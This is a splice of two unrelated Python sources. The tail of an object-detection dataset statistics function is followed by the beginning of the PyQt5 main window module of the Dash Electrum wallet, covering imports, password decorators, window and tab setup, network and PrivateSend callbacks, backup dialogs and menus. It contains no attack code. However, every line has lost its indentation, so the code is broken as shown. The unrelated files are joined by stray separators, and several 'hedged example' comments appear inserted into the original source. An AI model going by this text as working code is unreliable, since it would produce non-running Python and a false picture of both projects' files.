for label in tqdm(dataset.labels, total=dataset.n, desc='Statistics'):
x.append(np.bincount(label[:, 0].astype(int), minlength=data['nc']))
x = np.array(x) # shape(128x80)
stats[split] = {'instance_stats': {'total': int(x.sum()), 'per_class': x.sum(0).tolist()},
'image_stats': {'total': dataset.n, 'unlabelled': int(np.all(x == 0, 1).sum()),
'per_class': (x > 0).sum(0).tolist()},
'labels': [{str(Path(k).name): round_labels(v.tolist())} for k, v in
zip(dataset.img_files, dataset.labels)]}
if hub:
im_dir = hub_dir / 'images'
im_dir.mkdir(parents=True, exist_ok=True)
for _ in tqdm(ThreadPool(NUM_THREADS).imap(hub_ops, dataset.img_files), total=dataset.n, desc='HUB Ops'):
pass
# Profile
stats_path = hub_dir / 'stats.json'
if profile:
for _ in range(1):
file = stats_path.with_suffix('.npy')
t1 = time.time()
np.save(file, stats)
t2 = time.time()
x = np.load(file, allow_pickle=True)
print(f'stats.npy times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
file = stats_path.with_suffix('.json')
t1 = time.time()
with open(file, 'w') as f:
json.dump(stats, f) # save stats *.json
t2 = time.time()
with open(file) as f:
x = json.load(f) # load hyps dict
print(f'stats.json times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
# Save, print and return
if hub:
print(f'Saving {stats_path.resolve()}...')
with open(stats_path, 'w') as f:
json.dump(stats, f) # save stats.json
if verbose:
print(json.dumps(stats, indent=2, sort_keys=False))
return stats
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal, QPoint
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget, QToolButton)
import electrum_dash
from electrum_dash.gui import messages
from electrum_dash import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest)
from electrum_dash.base_crash_reporter import BaseCrashReporter
from electrum_dash.bitcoin import COIN, is_address
from electrum_dash.dash_ps_util import PSFeeTooHigh
from electrum_dash.dash_tx import DashTxError, ProTxBase, SPEC_TX_NAMES
from electrum_dash.plugin import run_hook, BasePlugin
from electrum_dash.i18n import _
from electrum_dash.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, NotEnoughFunds, FILE_OWNER_MODE,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
DASH_BIP21_URI_SCHEME, PAY_BIP21_URI_SCHEME,
InvoiceError)
from electrum_dash.invoices import (PR_TYPE_ONCHAIN,
PR_DEFAULT_EXPIRATION_WHEN_CREATING,
Invoice, InvoiceExt)
from electrum_dash.invoices import PR_PAID, PR_FAILED, pr_expiration_values, OnchainInvoice
from electrum_dash.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum_dash.util import AddTransactionException
from electrum_dash.wallet import (Multisig_Wallet, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum_dash.version import ELECTRUM_VERSION
from electrum_dash.network import (Network, TxBroadcastError, BestEffortRequestFailed,
UntrustedServerReturnedError, NetworkException)
from electrum_dash.exchange_rate import FxThread
from electrum_dash.simple_config import SimpleConfig
from electrum_dash.logging import Logger
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit, SizedFreezableLineEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
getOpenFileName, getSaveFileName)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
from .qrreader import scan_qrcode
from .dash_qt import ExtraPayloadWidget
from .privatesend_dialog import (find_ps_dialog, show_ps_dialog,
hide_ps_dialog, protected_with_parent,
show_ps_dialog_or_wizard)
from .protx_qt import create_dip3_tab
if TYPE_CHECKING:
from . import ElectrumGui
class StatusBarButton(QToolButton):
def __init__(self, icon, tooltip, func):
QToolButton.__init__(self)
self.setText('')
self.setIcon(icon)
self.setToolTip(tooltip)
self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.setAutoRaise(True)
self.setMaximumWidth(31)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() in [Qt.Key_Return, Qt.Key_Enter]:
self.func()
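# Hedged example of constructing a StatusBarButton (the icon name and callback are
# illustrative placeholders; func must be a zero-argument callable):
#   btn = StatusBarButton(read_QIcon("status_connected.png"), _("Network"), some_callback)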
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
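# Hedged usage sketch for @protected: the wrapped method gains a 'password' keyword that is
# filled in after prompting the user (or left as None for unencrypted wallets). The method
# name below is illustrative only:
#
#   @protected
#   def do_sign_message(self, address, message, password):
#       return self.wallet.sign_message(address, message, password)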
def ps_ks_protected(func):
def request_ps_ks_password(self, *args, **kwargs):
psman = self.wallet.psman
if not psman.is_hw_ks:
return func(self, *args, **kwargs)
if not psman.is_ps_ks_encrypted():
return func(self, *args, **kwargs)
fname = func.__name__
if fname == 'do_sign':
addr_edit = args[0]
addr = addr_edit.text().strip()
if not psman.is_ps_ks(addr):
return func(self, *args, **kwargs)
elif fname == 'do_decrypt':
pubkey_edit = args[1]
pubkey = pubkey_edit.text().strip()
addr = psman.pubkeys_to_address(pubkey)
if not psman.is_ps_ks(addr):
return func(self, *args, **kwargs)
elif fname == 'sign_tx':
tx = args[0]
if not psman.is_ps_ks_inputs_in_tx(tx):
return func(self, *args, **kwargs)
elif fname not in ['_delete_wallet', 'show_private_key']:
return func(self, *args, **kwargs)
parent = self.top_level_window()
password = None
while psman.is_ps_ks_encrypted():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
psman.ps_keystore.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_ps_ks_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
ps_signal = pyqtSignal(str, object)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.setObjectName("main_window_container")
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
Exception_Hook.maybe_setup(config=self.config, wallet=self.wallet)
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self._cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
self.pending_invoice = None
self.pending_invoice_ext = None
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.tabs.currentChanged.connect(self.on_tabs_switch)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.dip3_tab = create_dip3_tab(self, wallet)
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.setObjectName("main_window_nav_bar")
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
self.update_available_amount()
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.dip3_tab, read_QIcon("tab_dip3.png"), _("&DIP3"), "dip3")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QScrollArea()
central_widget.setObjectName("central_widget")
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
self.setMinimumWidth(640)
self.setMinimumHeight(400)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum-dash.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
self.gui_object.dash_net_sobj.main.connect(self.on_dash_net_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status',
'cert_mismatch', 'verified-islock',
'excessive-resource-usage']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# dash net callbacks
util.register_callback(self.on_dash_net,
['dash-net-updated',
'dash-peers-updated'])
self.update_dash_net_status_btn()
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
self.show_backup_msg()
# PrivateSend manager callbacks
self.ps_signal.connect(self.on_ps_signal)
util.register_callback(self.on_ps_callback,
['ps-log-changes',
'ps-wfl-changes',
'ps-not-enough-sm-denoms',
'ps-other-coins-arrived',
'ps-keypairs-changes',
'ps-reserved-changes',
'ps-data-changes',
'ps-state-changes'])
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Dash Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Dash Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Dash Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
self._update_check_thread = None
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Dash Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def on_tabs_switch(self, x):
if self.tabs.currentIndex() == self.tabs.indexOf(self.send_tab):
self.update_available_amount()
def show_backup_msg(self):
if getattr(self.wallet.storage, 'backup_message', None):
self.show_warning(self.wallet.storage.backup_message,
title=_('Information'))
self.wallet.storage.backup_message = ''
def run_coroutine_from_thread(self, coro, on_result=None):
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, PSFeeTooHigh):
self.show_error(e.detailed_msg())
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_dash_net(self, event, *args):
self.gui_object.dash_net_sobj.main.emit(event, args)
def on_dash_net_qt(self, event, args=None):
self.update_dash_net_status_btn()
def on_ps_callback(self, event, *args):
self.ps_signal.emit(event, args)
def on_ps_signal(self, event, args):
psman = self.wallet.psman
if event == 'ps-data-changes':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'ps-reserved-changes':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event in ['ps-state-changes', 'ps-wfl-changes',
'ps-keypairs-changes']:
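# Pad args to three elements; msg and msg_type are optional for these events.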
wallet, msg, msg_type = (*args, None, None)[:3]
if wallet == self.wallet:
self.update_ps_status_btn()
if msg:
parent = self
d = find_ps_dialog(self)
if d:
d.incoming_msg = True
if not d.is_hiding:
show_ps_dialog(self, d)
parent = d
if msg_type and msg_type.startswith('inf'):
parent.show_message(msg, title=_('PrivateSend'))
else:
parent.show_warning(msg, title=_('PrivateSend'))
if d:
d.incoming_msg = False
elif event == 'ps-not-enough-sm-denoms':
wallet, denoms_by_vals = args
if wallet == self.wallet:
q = psman.create_sm_denoms_data(confirm_txt=True)
if self.question(q):
self.create_small_denoms(denoms_by_vals, self)
elif event == 'ps-other-coins-arrived':
wallet, txid = args
if wallet == self.wallet:
q = '\n\n'.join([psman.OTHER_COINS_ARRIVED_MSG1.format(txid),
psman.OTHER_COINS_ARRIVED_MSG2,
psman.OTHER_COINS_ARRIVED_MSG3,
psman.OTHER_COINS_ARRIVED_MSG4,
psman.OTHER_COINS_ARRIVED_Q])
if self.question(q):
utxo_is_shown = self.config.get('show_utxo_tab', False)
if not utxo_is_shown:
self.toggle_tab(self.utxo_tab)
utxo_idx = self.tabs.indexOf(self.utxo_tab)
if self.tabs.currentIndex() != utxo_idx:
self.tabs.setCurrentIndex(utxo_idx)
self.utxo_list.toggle_ps(2) # PS Other coins
def update_dash_net_status_btn(self):
net = self.network
icon = (net.dash_net.status_icon() if net else 'dash_net_off.png')
self.dash_net_button.setIcon(read_QIcon(icon))
def update_ps_status_btn(self):
icon = 'privatesend.png'
status = _('Is Idle')
if self.wallet:
psman = self.wallet.psman
if psman.in_transit:
icon = 'privatesend_hg.png'
status = _('Is Mixing')
elif psman.is_waiting:
icon = 'privatesend_waiting.png'
status = _('Is Waiting')
elif psman.state in psman.mixing_running_states:
icon = 'privatesend_active.png'
status = _('Is Mixing')
self.ps_button.setIcon(read_QIcon(icon))
ps = _('PrivateSend')
tooltip = f'{ps} {status}'
self.ps_button.setToolTip(tooltip)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
if wallet.psman.need_notify(tx.txid()):
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'verified-islock':
wallet, tx_hash = args
if wallet == self.wallet:
self.need_update.set()
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
elif event == 'excessive-resource-usage':
self.notify(args[0])
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.daemon = True
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet: Abstract_Wallet):
wallet.thread = TaskThread(self, self.on_error)
self.dip3_tab.w_model.reload_data()
self.dip3_tab.update_wallet_label()
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
# Once the GUI has been initialized, check if we want to announce something, since the callback was called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Dash Electrum | Glory to Ukraine | Slava Ukraini! | "
if constants.net.TESTNET:
name += " " + constants.net.NET_NAME.capitalize()
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def ukraine_info(self):
info_uri = 'https://my.kuna.io/en/kunaid-ukraine'
info = (f'On Feb 24th at 4AM, the Russian Federation'
f' launched an all-out offensive against'
f' peaceful Ukrainian cities and citizens.'
f'<br/><br/>'
f'Dash Electrum team lives in Ukraine and loves Ukraine.'
f' You can help our fight against Russian invasion'
f' by donating at: '
f'<p><a href="{info_uri}">{info_uri}</a></p>'
f'<p>Slava Ukraini! Heroiam Slava!</p>')
self.show_message(info, title='Dash Electrum | Ukraine info',
rich_text=True)
def warn_if_watching_only(self):
watch_only_warn = self.config.get('watch_only_warn', True)
if self.wallet.is_watching_only() and watch_only_warn:
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Dash coins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Dash coins to be sent to this wallet.")
])
cb = QCheckBox(_("Don't show this again."))
def on_cb(x):
self.config.set_key('watch_only_warn', x != Qt.Checked,
save=True)
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Watch-only wallet'), checkbox=cb)
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Dash network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return False
backup_dir = self.config.get_backup_dir()
if backup_dir is None:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not configured"))
return
try:
new_path = self.wallet.save_backup(backup_dir)
except BaseException as reason:
self.show_critical(_("Dash Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
return True
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
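# Use a factory function to capture k by value; a plain lambda would bind the loop variable by reference.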
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
def export_privk_dlg():
self.export_privkeys_dialog(mwin=self, parent=self)
self.export_menu = self.private_keys_menu.addAction(_("&Export"),
export_privk_dlg)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
addresses_menu = wallet_menu.addMenu(_("&Coins"))
addresses_menu.addAction(_("&Filter"), lambda: self.utxo_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
